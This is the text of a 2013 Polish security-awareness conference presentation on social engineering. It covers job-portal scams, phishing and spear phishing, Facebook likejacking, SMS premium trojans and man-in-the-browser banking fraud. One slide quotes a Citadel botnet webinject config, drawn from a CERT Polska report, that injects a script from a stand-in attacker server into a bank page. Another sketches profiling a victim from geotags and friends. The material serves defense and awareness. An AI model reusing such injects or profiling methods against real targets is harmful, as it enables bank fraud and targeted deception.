Krzysztof Wagner, TUV Nord Polska, Katowice 2013 1
Najsłabszym ogniwem bezpieczeństwa informacji jest człowiek! 2
Najsilniejszym ogniwem bezpieczeństwa zawsze jest człowiek.jak mu się chce być! 3
Szkodliwa socjotechnika Socjotechnika jest jedną z metod działania cyberprzestępców polegającą na wywieraniu określonego wpływu na użytkownikach. Ataki bazujące na socjotechnice najczęściej są wymierzone masowo i do anonimowej ofiary. Ale może to być też celowany zabieg do konkretnej osoby 4
Szkodliwa socjotechnika Amunicja socjotechnik: Emocje - są podstawą do większości skutecznych technik. Emocje zabijają rozsądek. Manipulacja - użycie czegoś prawdziwego i rzeczywistego, czemu wierzymy. 5
Szkodliwa socjotechnika Użytkownik otrzymuje wiadomość będącą mieszaniną budzącą emocje i przywołującą ważną rzecz skłaniającą do dokonania określonej czynności. Najczęściej to: - kliknięcie w link przekierowujący do zainfekowanej, sfałszowanej strony internetowej - darmowa aplikacja na komputer, telefon - formularza z danymi do wypełnienia w celu wzięcia udziału w konkursie/ otrzymania nagrody itp. 6
Amunicja socjotechnik: Tajemniczy czynnik X 7
Emocje, manipulacja 8
Emocje i manipulacja na usługach czarnego IT 9
Szukasz pracy..znajdziesz problemy Wysyp portali oferujących pracę, pomoc w jej znalezieniu, prezentację CV itd. Dwa typy usług : - pomoc w uzyskaniu pracy np. utrzymywanie profilu poszukującego, kontakt z najlepszymi pracodawcami w tym wielkimi firmami - oferowanie pracy wprost. Zwykle prosta, przyjemna, nieźle płatna. 10
Szukasz pracy..znajdziesz problemy Cechy charakterystyczne działalności: - oferowanie zupełnie innej usługi niż wskazuje na to wizualizacja strony - pobieranie opłat np. za rejestrację. Równocześnie powiązany z tym brak w strefie wizualnej jakiejkolwiek informacji o płatności Bardzo niekorzystne, kuriozalne zapisy w regulaminach np. otrzymanie dodatkowej kary umownej za nieprzyjęcie wcześniej nałożonej. 11
Szukasz pracy..znajdziesz problemy Efekt końcowy : - deklaracja pomożemy Ci naleźć pracę, efekt końcowy prymitywne wyświetlanie, w kiepskiej oprawie graficznej naszych danych. - Praca, której nie da się wykonać, lub wynagrodzenie, które możemy otrzymać..za rok. 12
Szukasz pracy..znajdziesz problemy Diagnostyka socjo-patologiczna : Emocje to: Manipulacja to:... 13
WWW smaczne kąski Man in the browser: Zródło: Raport przejęcie botnetu Citadel, CERT Polska 14
WWW smaczne kąski Man in the browser -> Webinjects: Target URL : "http://nasz.internetowy.bank/*" data_before <html*xmlns*>*<head> data_after </body> data_inject 6 2 BOTNET CITADEL <script type="text/javascript" src="https://evilserver.example.com/grabmoney.js"> - </script> Zródło: Raport przejęcie botnetu Citadel, CERT Polska 15
WWW smaczne kąski Webinjects - efekt końcowy: - dowolna zmiana danych na stronie wyświetlanej w przeglądarce - inteligencja zmian: np. prośba o zwrot niesłusznego przelewu i równoczesne zwiększenie salda o wymaganą kwotę. - customizacja : Malware posiadał konfiguracje kodu html dostosowane do polskich instytucji płatniczych: kolory, czcionki, itd. - dobry język polski, bez błędów i wpadek gramatycznych. Za: Raport przejęcie botnetu Citadel, CERT Polska 16
Poczta elektroniczna Phishing nudne aż do bólu 17
Phishing poziom socjotechniki -10 18
Phishing poziom 2 19
Phishing Jedną z niebezpiecznych odmian ataków opartych na medium jakim jest poczta elektroniczna są ataki typu spear phishing. Atak typu spear phishing to wiadomość e-mail, która jest wysłana rzeczywiście do Ciebie 20
Spear phishing poziom socjotechniki 10 Wiadomość e-mail od znajomego Osoba przeprowadzająca atak wykorzystuje znajomość informacji dotyczących ofiary. Zwykle zna imię i nazwisko użytkownika, lub jego znajomych, adresy e-mail i przynajmniej niewielką ilość osobistych danych. Ciekawy trick: Pozdrowienie w wiadomości e-mail zwykle jest personalizowane, kolokwialne np. Cześć, Ciao Ola Dlaczego??? 21
Scenariusz spear phishing Kupujemy aparat w sklepie internetowym. 22
Scenariusz spear phishing Co mam: - geotagi z publikowanych zdjęć w portalu fotograficznym (ten sam użytkownik, ten sam aparat, pasują daty) - znajomi z facebooka Chyba wystarczy aby zabrać się do roboty? Wiem gdzie mieszkasz! Wiem kogo lubisz! 23
Facebook Większość oszustw i zagrożeń na Facebooku ma formę tzw. likejackingu. Cechą charakterystyczną tego portalu jest przycisk like ( lubię to ), dzięki któremu można zasugerować znajomym, że podoba się nam dana strona, aplikacja czy też film. Na lajkach można sporo zarobić. 24
Facebook Niewidzialne ramki do zbierania lajków: 25
Facebook Inne ataki na Facebook np. pass jacking: 26
Facebook 27
Komóreczki Podaj nr telefonu..my zrobimy resztę! 28
Komóreczki Efekt : błyskawicznie wyczerpany limit, bardzo wysoki rachunek za połączenia. Zapisali Cię do SMS Premium! 29
Komóreczki Szkodnik dla Androida: Boxer.AA. Zainfekowany telefon, automatycznie, bez wiedzy właściciela, rozsyła wiadomości SMS na numery o podwyższonej opłacie. Cały proces odbywa się w pełni automatycznie i jest niewidoczny dla użytkownika, dopóki nie wyczerpią się środki na koncie pre-paid lub nie przyjdzie wysoki rachunek do abonenta. 30
Komóreczki "Po zagnieżdżeniu się w pamięci telefonu Trojan Boxer.AA identyfikuje kody MCC (Mobile Country Code) oraz MNC (Mobile Network Code), dzięki którym wie, w jakim kraju i z jakiej sieci korzysta jego ofiara. Następnie Boxer.AA koreluje wspomniane kody z numerem telefonicznym, na który przesyła wiadomość SMS premium (...) Trojan zaciera wszelkie ślady swojej aktywności, ukrywając przed użytkownikiem m.in. wiadomości potwierdzające aktywację usługi dla danego numeru premium Źródło: ekspert f-my Eset. Efekt końcowy w Polsce SMS za 25 zł 31
Komóreczki Źródło trojana: jak zwykle. Zainfekowane atrakcyjne strony, programiki, pozyskane w trakcie surfowania przy użyciu mobilnych urządzeń. 32
E-security zintegrowana socjotechnika Scenariusz ataku: - Infekcja komputera ofiary. Za pomocą Man in the browser oczekiwanie na odpowiednią stronę np. banku. - Przy uruchomieniu strony komunikat techniczny ze strony : 33
E-security zintegrowana socjotechnika Scenariusz ataku c.d. : - na telefon przychodzi SMS z informacją że dziękujemy.. i linkiem do certyfikatu. Instalujemy. Pełna kontrola nad SMS-ami, itd.. 34
E-security zintegrowana socjotechnika Po zainstalowaniu aplikacji na urządzeniu mobilnym, dajemy do dyspozycji przestępcom: - nasz login i hasło (na WWW) - powiązany z naszym kontem bankowym telefon - pełna kontrola nad klawiaturą, ekranem, wyświetlaniem - pełna kontrola nad urządzeniem mobilnym np. przechwytywanie, wysyłanie SMS-ów potwierdzających operacje itd. Całkiem sporo by coś ukraść! 35
Na koniec Włączamy tryb paranoja : Czy moja żona to żona? A może jakiś Lifehack? Pozdrawiam Krzysztof Wagner IV Konferencja Bezpieczeństwa Informacji 2013 26/06/2013 36